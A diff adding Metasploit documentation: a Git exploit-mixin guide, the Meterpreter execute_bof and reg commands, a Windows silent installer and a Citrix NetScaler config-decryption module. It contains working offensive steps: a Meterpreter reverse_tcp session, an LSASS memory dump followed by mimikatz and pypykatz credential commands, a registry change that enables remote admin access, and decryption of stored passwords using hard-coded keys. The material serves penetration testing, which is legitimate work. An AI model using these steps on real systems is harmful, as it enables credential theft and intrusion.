+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid upload-pack request') unless response
+    else
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')
+    end
+
+    cli.send_response(response)
+  end
+end
+```
+
+### Running the module
+
+The module will start the http server and print the repo to clone
+
+```
+msf6 > use exploit/multi/http/git_clone_test
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(multi/http/git_clone_test) > set srvport 9999
+srvport => 9999
+msf6 exploit(multi/http/git_clone_test) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(multi/http/git_clone_test) > set srvhost 192.168.140.1
+srvhost => 192.168.140.1
+msf6 exploit(multi/http/git_clone_test) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+msf6 exploit(multi/http/git_clone_test) > [*] Started reverse TCP handler on 192.168.140.1:4444 
+[*] Using URL: http://192.168.140.1:9999/MOYuJfC
+[*] Server started.
+[*] Git repository to clone: http://192.168.140.1:9999/y-find.git
+```
+
+Once the repository is cloned, you should expect to see the same contents as the `test-repo` at the beginning of this document:
+
+```
+space@ubuntu:~$ git clone http://192.168.140.1:9999/y-find.git
+Cloning into 'y-find'...
+remote: Enumerating objects: 6, done.
+remote: Counting objects: 100% (6/6), done.
+remote: Compressing objects: 100% (6/6), done.
+remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 0
+Unpacking objects: 100% (6/6), 401 bytes | 200.00 KiB/s, done.
+space@ubuntu:~$ cd y-find
+space@ubuntu:~/y-find$ ls -al
+total 20
+drwxrwxr-x  4 space space 4096 Sep 22 12:05 .
+drwxr-x--- 22 space space 4096 Sep 22 12:05 ..
+drwxrwxr-x  2 space space 4096 Sep 22 12:05 dir
+-rw-rw-r--  1 space space   10 Sep 22 12:05 file.txt
+drwxrwxr-x  8 space space 4096 Sep 22 12:05 .git
+space@ubuntu:~/y-find$ cat dir/test_file.txt 
+test
+space@ubuntu:~/y-find$ cat file.txt
+some text
+```
+
+[1]: https://github.com/rapid7/metasploit-framework/blob/b1a6d9d30778bed11276ac8685f88d0a4dc98e19/lib/msf/core/exploit/git.rb
+[2]: https://github.com/rapid7/metasploit-framework/blob/b1a6d9d30778bed11276ac8685f88d0a4dc98e19/lib/msf/core/exploit/git/smart_http.rb
+[3]: https://git-scm.com/docs/http-protocol
@@ -0,0 +1,154 @@
+This guide outlines how to use the Meterpreter `execute_bof` command as provided by the `bofloader` extension. It allows
+a Meterpreter session to execute "Beacon Object Files" or BOF files for short. A BOF is a
+[Common Object File Format][1] (COFF) executable file with an API of standard functions defined in [beacon.h][2].
+
+The `bofloader` extension is only available for the Windows native Meterpreter, i.e. it is unavailable in the Java
+Meterpreter even when running on the Windows platform.
+
+# Execution Environment
+**Warning:** The execution environment is shared with the Meterpreter process. If there is an exception or the BOF
+crashes, the Meterpreter session will die. It is suggested that users invoke this functionality through a dedicated
+session to avoid losing access altogether.
+
+The loader and execution environment are provided by [trustedsec/COFFLoader][3]. The extension is therefor subject to
+the same limitations.
+
+The following functions are unavailable:
+
+* `BeaconDataPtr`
+* `BeaconUseToken`<sup>1</sup>
+* `BeaconRevertToken`<sup>1</sup>
+* `BeaconIsAdmin`
+* `BeaconInjectProcess`
+* `BeaconInjectTemporaryProcess`
+
+<sup>1</sup> The token functions are defined and present, but will only effect the execution of the BOF and not the
+Meterpreter runtime environment.
+
+Currently, there is only one output stream. All output data processed by `BeaconOutput` and `BeaconPrintf` is combined
+into that stream. BOFs should not use this for outputting binary data.
+
+# Usage
+The `bofloader` extension provides exactly one command, through which all of the provided functionality is accessed.
+
+`execute_bof </path/to/bof_file> [Options] -- [BOF Arguments]`
+
+
+
+* `-c` / `--compile` -- Compile the input file (requires mingw).
+* `-e` / `--entry` -- The entry point (default: `go`).
+* `-f` / `--format-string` -- Argument format-string. See details below.
+
+## Compile
+The compile option will use a local mingw instance to compile the input file into a COFF file for execution. The
+standard [beacon.h][2] file will be in the include path automatically. In this case, the input file is treated as a C
+source file instead of compiled data.
+
+## Entry Point
+Once loaded the loader will call the BOF entry point. By default, this value is `go`. The entry point option can change
+it to another valid function to call instead.
+
+## Argument Format-String
+The `execute_bof` command is capable of serializing arguments to be sent to the BOF for execution. The user must define
+the data type of each argument that the BOF file expecting to see. This information would come from either reading the
+BOF's documentation or source code. **Incorrectly specifying the arguments or omitting them entirely can result in the
+BOF crashing and the Meterpreter session dying.**
+
+BOF argument types are defined in the format string argument with `-f` / `--format-string`.
+
+The following table describes each of the types.
+
+| Type    | Description                                                     | Unpack With (C)               |
+| --------|-----------------------------------------------------------------|-------------------------------|
+| b       | binary data (e.g. 01020304, file:/path/to/file.bin)<sup>1</sup> | BeaconDataExtract             |
+| i       | 32-bit integer (e.g. 0x1234, 5678)<sup>2</sup>                  | BeaconDataInt                 |
+| s       | 16-bit integer (e.g. 0x1234, 5678)<sup>2</sup>                  | BeaconDataShort               |
+| z       | null-terminated utf-8 string                                    | BeaconDataExtract             |
+| Z       | null-terminated utf-16 string                                   | (wchar_t *)BeaconDataExtract  |
+
+<sup>1</sup> Binary data arguments are specified as either a stream of hex characters or as the path to a file local to
+the Metasploit Framework instance. In the case of a file path, it must be prefixed with `file:`.
+
+<sup>2</sup> Integer arguments are specified as either decimal or hexadecimal literals.
+
+Unknown arguments are treated as BOF arguments. Additionally, any arguments after the `--` terminator are explicitly
+treated as BOF arguments. Using the terminator allows ambiguous arguments to such as `--help` to be forward to the BOF
+instead of being processed locally. The number of BOF arguments to be forward must equal number of characters in the
+argument format string.
+
+# Usage Examples
+Executing [dir][4], passing the path argument and number of sub-directories to list.
+
+```
+meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\ 0
+Contents of C:\*:
+	08/05/2022 15:17           <dir> $Recycle.Bin
+	08/05/2022 15:16      <junction> Documents and Settings
+	09/22/2022 08:35      1342177280 pagefile.sys
+	08/05/2022 16:48           <dir> PerfLogs
+	09/08/2022 12:51           <dir> Program Files
+	09/15/2018 05:06           <dir> Program Files (x86)
+	08/05/2022 15:26           <dir> ProgramData
+	09/07/2022 10:24           <dir> Python27
+	08/05/2022 15:16           <dir> Recovery
+	08/05/2022 15:40           <dir> System Volume Information
+	08/05/2022 15:16           <dir> Users
+	09/01/2022 13:49           <dir> Windows
+	                      1342177280 Total File Size for 1 File(s)
+	                                                     11 Dir(s)
+
+meterpreter > 
+```
+
+Executing [nanodump][5]. First the PID of LSASS is found, then the argument string is constructed. The output must be
+written to disk. Once completed, the dump file can be downloaded from the remote host.
+
+```
+meterpreter > ps lsass
+Filtering on 'lsass'
+
+Process List
+============
+
+ PID  PPID  Name       Arch  Session  User                 Path
+ ---  ----  ----       ----  -------  ----                 ----
+ 712  556   lsass.exe  x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
+
+meterpreter > execute_bof nanodump.x64.o --format-string iziiiiiiiiziiiz 712 nanodump.dmp 1 1 0 0 0 0 0 0 "" 0 0 0 ""
+Done, to download the dump run:
+download nanodump.dmp
+to get the secretz run:
+python3 -m pypykatz lsa minidump nanodump.dmp
+mimikatz.exe "sekurlsa::minidump nanodump.dmp" "sekurlsa::logonPasswords full" exit
+meterpreter > download nanodump.dmp 
+[*] Downloading: nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 1.00 MiB of 11.56 MiB (8.65%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 2.00 MiB of 11.56 MiB (17.31%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 3.00 MiB of 11.56 MiB (25.96%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 4.00 MiB of 11.56 MiB (34.62%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 5.00 MiB of 11.56 MiB (43.27%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 6.00 MiB of 11.56 MiB (51.92%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 7.00 MiB of 11.56 MiB (60.58%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 8.00 MiB of 11.56 MiB (69.23%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 9.00 MiB of 11.56 MiB (77.89%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 10.00 MiB of 11.56 MiB (86.54%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 11.00 MiB of 11.56 MiB (95.2%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] Downloaded 11.56 MiB of 11.56 MiB (100.0%): nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+[*] download   : nanodump.dmp -> /mnt/hgfs/vmshare/nanodump.dmp
+meterpreter > 
+```
+
+# References
+
+* [hstechdocs.helpsystems.com/manuals/cobaltstrike][6] for Cobalt Strike's BOF documentation
+* [beacon.h][2] source code for the BOF API
+* [TrustedSec/COFFLoader][3] for the source code of the loader
+* [trustedsec/CS-Situational-Awareness-BOFF][7] for a collection of useful BOFs
+
+[1]: https://en.wikipedia.org/wiki/COFF
+[2]: https://github.com/Cobalt-Strike/bof_template/blob/4a5009fc4adeb35bb1b1887da478280f12f9693a/beacon.h
+[3]: https://github.com/TrustedSec/COFFLoader
+[4]: https://github.com/trustedsec/CS-Situational-Awareness-BOF/tree/master/src/SA/dir
+[5]: https://github.com/helpsystems/nanodump
+[6]: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm
+[7]: https://github.com/trustedsec/CS-Situational-Awareness-BOF
@@ -0,0 +1,229 @@
+This guide outlines how to use Meterpreter to manipulate the registry, similar to the `regedit.cmd` program on a Windows machine.
+
+# Concepts
+
+The Window's registry is used to store configuration settings for both the operating system, as well as software applications. This registry is hierarchical and stores keys and values. The registry keys are similar to folders, and registry values are similar to files. Each registry key should be unique and is separated by backslashes - similar to a Window's filepath.
+
+## Root keys
+
+Every registry key must start from one of the following root keys or abbreviations:
+
+- `HKEY_LOCAL_MACHINE` or `HKLM`
+- `HKEY_CURRENT_USER` or `HKCU`
+- `HKEY_USERS` or `HKU`
+- `HKEY_CLASSES_ROOT` or `HKCR`
+- `HKEY_CURRENT_CONFIG` or `HKCC`
+- `HKEY_PERFORMANCE_DATA` or `HKPD`
+- `HKEY_DYN_DATA` or `HKDD`
+
+## Value types
+
+Each value also has an associated type, for example:
+
+- `REG_NONE`
+- `REG_BINARY`
+- `REG_DWORD` / `REG_DWORD_LITTLE_ENDIAN` / `REG_DWORD_BIG_ENDIAN` - 32-bit number
+- `REG_QWORD` / `REG_QWORD_LITTLE_ENDIAN` - 64-bit number
+- `REG_SZ` - String value, terminated with a null byte
+- `REG_EXPAND_SZ` - String value which contains unexpanded environment variables, i.e. `%APPDATA%`
+- `REG_MULTI_SZ` - An array of strings. Each string is separated by a null byte, with a final trailing null byte. i.e. `line1\0line2\0\line3\0\0`
+
+# Examples
+
+All of these examples assume you are in a Meterpreter session. To see the latest help information run `help reg`:
+
+```
+meterpreter > help reg
+Usage: reg [command] [options]
+Interact with the target machine's registry.
+```
+
+## Common mistakes
+
+### Escaping keys
+
+Registry keys must be escaped correctly. Window's registry keys are escaped with backslashes. In msfconsole backslashes and spaces have a special meaning - which means you will need to escape these characters for your key to work as expected.
+
+```
+# Valid: Using single quotes around the registry key
+meterpreter > reg enumkey -k 'HKCU\Keyboard Layout'
+
+# Valid: Escaping the backslash and spaces within the registry key
+meterpreter > reg enumkey -k HKCU\\Keyboard\ Layout
+
+# Invalid examples: The user has not escaped backslashes or spaces correctly:
+meterpreter > reg enumkey -k HKLM\SAM
+meterpreter > reg enumkey -k HKCU\\Keyboard Layout
+```
+
+### 32/64 bit differences
+
+The result of your registry queries can be impacted if you are interacting with a x86 or x64 Windows session.
+You can see the type of session you currently have open with the `sessions` command:
+
+```
+msf6 exploit(windows/smb/psexec) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                            Connection
+  --  ----  ----                     -----------                            ----------
+  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4444 -> 192.168.123.141:58209 (192.168.123.141)
+  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ DESKTOP-N3MAG5R  192.168.123.1:4433 -> 192.168.123.141:58263 (192.168.123.141)
+```
+
+For example - when interacting with a x86 session there are 12 keys listed:
+
+```
+# x86 Session
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
+
+  Keys (12):
+  # ... omitted for clarity ...
+```
+
+Versus a x64 session which shows 23 keys:
+
+```
+# x64 Session
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
+
+  Keys (23):
+
+  # ... omitted for clarity ...
+```
+
+If this is problematic either [[upgrade your session to Meterpreter|./Metasploit-Guide-Upgrading-Shells-to-Meterpreter.md]], or specify the `-w` flag which will impact the result of queries:
+
+```
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 32
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
+
+  Keys (12):
+  # ... omitted for clarity ...
+```
+
+```
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 64
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
+
+  Keys (23):
+
+  # ... omitted for clarity ...
+```
+
+## Enumerate registry keys
+
+Enumerate a root key:
+
+```
+meterpreter > reg enumkey -k HKLM
+Enumerating: HKLM
+
+  Keys (6):
+
+        BCD00000000
+        HARDWARE
+        SAM
+        SECURITY
+        SOFTWARE
+        SYSTEM
+```
+
+Enumerate a subkey:
+
+```
+meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
+Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
+
+  Values (2):
+
+        SecurityHealth
+        VMware User Process
+```
+
+## Query values
+
+Display the registry value and type information:
+
+```
+meterpreter > reg queryval -k 'HKLM\Software\Microsoft\Windows NT\CurrentVersion' -v ProductName
+Key: HKLM\Software\Microsoft\Windows NT\CurrentVersion
+Name: ProductName
+Type: REG_SZ
+Data: Windows 10 Enterprise
+```
+
+Values that are of type `REG_SZ_EXPAND` such as ` %SystemRoot%\system32\drivers\GM.DLS` will not automatically be expanded:
+
+```
+meterpreter > reg queryval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic' -v 'GMFilePath'
+Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic
+Name: GMFilePath
+Type: REG_EXPAND_SZ
+Data: C:\Windows\system32\drivers\GM.DLS
+```
+
+Values that are of type `REG_MULTI_SZ` will be separated by `\0`:
+
+```
+meterpreter > reg queryval -k 'HKLM\Software\example' -v 'example multi value with spaces'
+Key: HKLM\Software\example
+Name: example multi value with spaces
+Type: REG_MULTI_SZ
+Data: line1\0line2\0line3
+```
+
+### Creating a key
+
+```
+meterpreter > reg createkey -k 'HKLM\software\example'
+Successfully created key: HKLM\software\example
+```
+
+### Setting a value
+
+Setting a `REG_DWORD` - use a decimal value:
+
+```
+meterpreter > reg setval -k 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1
+Successfully set LocalAccountTokenFilterPolicy of REG_DWORD.
+```
+
+Setting a `REG_QWORD` - use a decimal value:
+
+```
+meterpreter > reg setval -k 'HKLM\Software\example' -t REG_DWORD -v qword_example -d 12345678
+Successfully set example multi value with spaces of REG_MULTI_SZ.
+```
+
+Setting `REG_MULTI_SZ` - i.e. an array of strings:
+
+```
+meterpreter > reg setval -k 'HKLM\Software\example' -t REG_MULTI_SZ -v 'example multi value with spaces' -d 'line1\0line2\0line3'
+Successfully set example multi value with spaces of REG_MULTI_SZ.
+```
+
+Setting `REG_BINARY` - use lowercase hexadecimal input without the preceding `0x`:
+
+```
+meterpreter > reg setval -k 'HKLM\Software\example' -t REG_BINARY -v binary_example -d deadbeef
+Successfully set binary_example of REG_BINARY.
+```
+
+### Deleting a key
+
+```
+meterpreter > reg deletekey -k 'HKLM\software\example'
+Successfully deleted key: HKLM\software\example
+```
+
+### Deleting a value
+
+```
+meterpreter > reg deleteval -k 'HKLM\software\example' -v 'example multi value with spaces'
+Successfully deleted example multi value with spaces.
+```
@@ -30,6 +30,33 @@ Download the [latest Windows installer](https://windows.metasploit.com/metasploi

 If you downloaded Metasploit from us, there is no cause for alarm.  We pride ourselves on offering the ability for our customers and followers to have the same toolset that the hackers have so that they can test systems more accurately.  Because these (and the other exploits and tools in Metasploit) are identical or very similar to existing malicious toolsets, they can be used for nefarious purposes, and they are often flagged and automatically removed by antivirus programs, just like the malware they mimic.

+### Windows silent installation
+
+The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
+```
+[CmdletBinding()]
+Param(
+    $DownloadURL = "https://windows.metasploit.com/metasploitframework-latest.msi",
+    $DownloadLocation = "$env:APPDATA/Metasploit",
+    $InstallLocation = "C:\Tools",
+    $LogLocation = "$DownloadLocation/install.log"
+)
+
+If(! (Test-Path $DownloadLocation) ){
+    New-Item -Path $DownloadLocation -ItemType Directory
+}
+
+If(! (Test-Path $InstallLocation) ){
+    New-Item -Path $InstallLocation -ItemType Directory
+}
+
+$Installer = "$DownloadLocation/metasploit.msi"
+
+Invoke-WebRequest -UseBasicParsing -Uri $DownloadURL -OutFile $Installer
+
+& $Installer /q /log $LogLocation INSTALLLOCATION="$InstallLocation"
+```
+
 ## Improving these installers

 Feel free to review and help improve [the source code for our installers](https://github.com/rapid7/metasploit-omnibus).
@@ -211,6 +211,14 @@ NAVIGATION_CONFIG = [
                path: 'Meterpreter-Debugging-Meterpreter-Sessions.md',
                title: without_prefix('Meterpreter ')
              },
+              {
+                path: 'Meterpreter-ExecuteBof-Command.md',
+                title: without_prefix('Meterpreter ')
+              },
+              {
+                path: 'Meterpreter-Reg-Command.md',
+                title: without_prefix('Meterpreter ')
+              },
              {
                path: 'How-to-get-started-with-writing-a-Meterpreter-script.md'
              },
@@ -268,13 +276,17 @@ NAVIGATION_CONFIG = [
            nav_order: 1
          },
          {
-            path: 'dev/Setting-Up-a-Metasploit-Development-Environment.md',
+            path: 'Creating-Your-First-PR.md',
            nav_order: 2
          },
          {
-            path: 'Sanitizing-PCAPs.md',
+            path: 'dev/Setting-Up-a-Metasploit-Development-Environment.md',
            nav_order: 3
          },
+          {
+            path: 'Sanitizing-PCAPs.md',
+            nav_order: 4
+          },
          {
            old_wiki_path: "Navigating-and-Understanding-Metasploit's-Codebase.md",
            path: 'Navigating-and-Understanding-Metasploits-Codebase.md',
@@ -434,6 +446,10 @@ NAVIGATION_CONFIG = [
                path: 'How-to-use-PhpEXE-to-exploit-an-arbitrary-file-upload-bug.md',
                title: 'PhpExe'
              },
+              {
+                path: 'How-to-use-the-Git-mixin-to-write-an-exploit-module.md',
+                title: 'Git Mixin'
+              },
              {
                title: 'HTTP',
                folder: 'http',
@@ -0,0 +1,212 @@
+This module takes a Citrix NetScaler `ns.conf` configuration file as input and extracts secrets that
+have been stored with reversible encryption. The module supports legacy NetScaler encryption (RC4)
+as well as the newer AES-256-ECB and AES-256-CBC encryption types. It is also possible to decrypt
+secrets protected by the Key Encryption Key (KEK) method, provided the key fragment files F1.key
+and F2.key are provided. Currently, keys for appliances in FIPS mode or running hardware HSM cannot 
+be extracted. Root access to a NetScaler device or access to a NetScaler configuration backup are
+the most effective means of acquiring the configuration file and key fragments.
+
+This module incorporates research published by dozer:
+
+https://dozer.nz/posts/citrix-decrypt/
+
+## Vulnerable Application
+This module is tested against the configuration files for NetScaler versions 10.x, 11x, 12.x and
+13.x. The module will work with files retrieved from a live NetScaler system as well as files
+extracted from an unencrypted NetScaler backup archive. This is possible because NetScaler uses
+well-known hard coded encryption keys which are visible on the system in the hidden file:
+
+`/nsconfig/.skf`
+
+These static keys are:
+
+```
+NetScaler RC4:
+  2286da6ca015bcd9b7259753c2a5fbc2
+NetScaler AES:
+  351cbe38f041320f22d990ad8365889c7de2fcccae5a1a8707e21e4adccd4ad9
+```
+The module is also able to decrypt secrets encrypted with NetScaler KEK, provided the associated
+`F1.key` and `F2.key` fragments are provided. Private key passphrases that use `-passcrypt` are not
+currently decryptable by this module, but any secret that uses the `-encrypted` parameter should be
+fully recoverable.
+
+## Verification Steps
+You must possess a NetScaler `ns.conf` file in order to use this module. If the NetScaler is running
+NS13.0 Build76.xx.nc or higher, or the administrator has configured KEK encryption, you must also
+possess the associated KEK key fragments in order to decrypt the file. All files must be local to
+the system invoking the module. Where possible, you should provide the `NS_IP` option to tag
+relevant loot entries with the IPv4 address of the originating system. If no value is provided for
+`NS_IP` the module defaults to assigning the loopback IP `127.0.0.1`.
+
+1. Acquire the `ns.conf` file, and associated `F1.key` and `F2.key` files if using NS KEK
+2. Start msfconsole
+3. Do: `modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt.rb`
+4. Do: `set ns_conf <path to ns.conf>` to provide the location of the NetScaler config file
+5. Do: `set ns_kek_f1 <path to f1.key>` if you are decrypting a file using NS KEK
+6. Do: `set ns_kek_f2 <path to f2.key>` if you are decrypting a file using NS KEK
+6. Do: `set ns_ip <NetScaler IPv4>` to attach the target NetScaler IPv4 address to loot entries
+7. Do: `dump`
+
+## Options
+### NS_CONF
+
+Path to the NetScaler configuration file on the local system. Example: `/tmp/ns.conf`
+
+### NS_KEK_F1
+
+Path to the first of two NS KEK fragments, if decrypting NS KEK. Example: `/tmp/F1.key`
+
+### NS_KEK_F2
+
+Path to the second  of two NS KEK fragments, if decrypting NS KEK. Example: `/tmp/F2.key`
+
+### NS_IP
+
+Optional parameter to set the IPv4 address associated with loot entries made by the module.
+
+## Scenarios
+
+### Acquire NetScaler Config File
+NetScaler configuration files can be retrieved from a live system by running
+
+`show ns.conf`
+
+From the nscli or
+
+`cat /nsconfig/ns.conf`
+
+from the BSD shell. These files can also be retrieved from NetScaler configuration backup
+archives which are generated from the appliance admin interface.
+
+### Acquire KEK Fragment Files
+As of NS13.0 Build76.xx.nc NetScaler requires mandatory use of the Key Encryption Key (KEK)
+scheme. If secrets within the config file use KEK, you must also posses the associated KEK F1
+and F2 fragment files in order to perform decryption. Secrets that require KEK fragments to
+decrypt will include the `-kek` parameter on the associated configuration line. It is possible
+for an admin to manually enable KEK in NS builds prior to Build76.xx.nc - if this has been done,
+the current KEK key fragments are located in the following paths:
+
+`/nsconfig/F1.key`
+`/nsconfig/F2.key`
+
+After NS13.0 Build76.xx.nc, KEK is mandatory and managed by the NetScaler itself. Key fragments
+are presumably regenerated during firmware upgrades, and a journal is maintained in `/nsconfig/keys`
+suffixed with a date stamp. The `F1.key` and `F2.key` files are ignored, and the new "current" KEK
+key is stored in hidden files at paths:
+
+`/nsconfig/.F1.key`
+`/nsconfig/.F2.key`
+
+As well as under `/nsconfig/keys`. Note that both fragments must be provided for successful
+decryption. The module can be run without providing KEK fragments, but will be unable to decrypt
+any secrets that use KEK encryption. An unencrypted NetScaler backup archive will contain all KEK
+fragments currently defined on the appliance as well as the current `ns.conf` file.
+
+### Running the Module
+
+Example run against config file without KEK from NetScaler VPX running NS11.0 Build 62.10.nc:
+```
+msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf.NS11.0-62.10.conf
+ns_conf => /tmp/ns.conf.NS11.0-62.10.conf
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+
+[*] Config line:
+add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key -passcrypt "VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=" -expiryMonitor DISABLED
+[!] Not decrypting passcrypt entry:
+[!] Ciphertext: VbuAvo9nq18Zap0joBBv1a1Chm5BOerJ3GhYWU+Wbv0=
+[*] Config line:
+set ns encryptionParams -method AES256 -keyValue 7654526a2f3ceffd877b286a8acece43da700d06133dc985f7ebdeb076135bcb755472e04f5d92aba9f07334eb8e936a58782ce76bb3f6d6e44adf727e8e88d602b8bdae1817d26203fe281a8429574d -encrypted -encryptmethod ENCMTHD_3
+[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
+[*] Config line:
+add authentication radiusAction UTIL1 -serverIP 10.100.10.13 -serverPort 1812 -radKey f8e4f532e9d4e6bebab169b3be9e77b5c851466b7760c469bd64a15d2e8d3c602025c41372094d06e207789d58b6acb7 -encrypted -encryptmethod ENCMTHD_3
+[+] Plaintext: hbZaADYDUmdHv7AhHsAb6eCde2M82m0
+[*] Config line:
+add authentication ldapAction LDAP -serverName ldap.cesium137.io -serverPort 636 -ldapBase "DC=chainheart,DC=com" -ldapBindDn wiz@cesium137.io -ldapBindDnPassword f5dc75680b925dbd3c0a8154c8fee056bfe77ac774797de3c0867d368bd09c2cdd872a36e15a1f07abf773740e2c8a12 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName sAMAccountName -groupAttrName memberOf -secType SSL -ldapHostname ldap.cesium137.io
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Config line:
+set ns rpcNode 10.100.10.11 -password 9ec84444b10941dc4222f93b29a75f0aa237ffdcc73a81355bf5d1cf3d80058daaad7ca58e488e54bc3ff3eea8ffd9eb -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
+[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
+[*] Config line:
+set ns rpcNode 10.100.10.12 -password dd5c0c4952509e2fcfaeb238dfc361b79a844df09254087920ee0cf4dc447161bde8491d8a39ded0fa2526cc46e6a00f -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
+[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
+[*] Config line:
+add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password e209865546c3d2e8462e3e7a962252eb6d9e26374163c8d902fc3535cb12638c514765dcea4792eb1e3e6b5e1c1c4cef -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -secure YES -baseDN "DC=chainheart,DC=com" -bindDN wiz@cesium137.io -filter CN=builtin
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Config line:
+add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 4ae7bec92e25d985df315e543b846b2c30346840d8e945f5073832c3e479d60eee581f67d671759ae555210529eaec8d -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=chainheart,DC=com" -bindDN wiz@cesium137.io -filter CN=builtin
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+```
+
+Example run against config file using KEK from NetScaler VPX running NS13.0 Build 85.15.nc:
+
+```
+msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf 
+ns_conf => /tmp/ns.conf
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f1 /tmp/F1.key
+ns_kek_f1 => /tmp/F1.key
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f2 /tmp/F2.key
+ns_kek_f2 => /tmp/F2.key
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+
+[*] Building NetScaler KEK from key fragments ...
+[+] NS KEK F1
+[+]      HEX: dd2588bb3cb20dd643216c33489776c78e8c56f13b1301e0984dc80564eea49e
+[+] NS KEK F2
+[+]      HEX: 45f9e6780a1dc40b6fe75bedf2f6dbb9a86e4315d07313014fe2381c52e44d8f
+[+] Assembled NS KEK AES key
+[+]      HEX: 54f202b9a94649fd9eaa3f13eab514a5a267f460db0a2393f8b25f321a7d79e0
+
+[*] Config line:
+add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key 30f39257d8aacc737182568184e0d535002d90a7aba3454c1e8766a958d3a4a720e485c498adc681f0e7559ff633f932 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: zgkEUD86rUv76coT0DkIBj1xlp5qEzH
+[*] Config line:
+add ssl certKey ldap_cesium137_io -cert ldap_cesium137_io.pem -key ldap_cesium137_io.key d7902778370c616480ef781c5b3922ef31bd90e75dd3aecfa0fa8a5bafc4fa16b20ed2f7a07970c3f4d8ba201a3b9b72 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor ENABLED -notificationPeriod 90
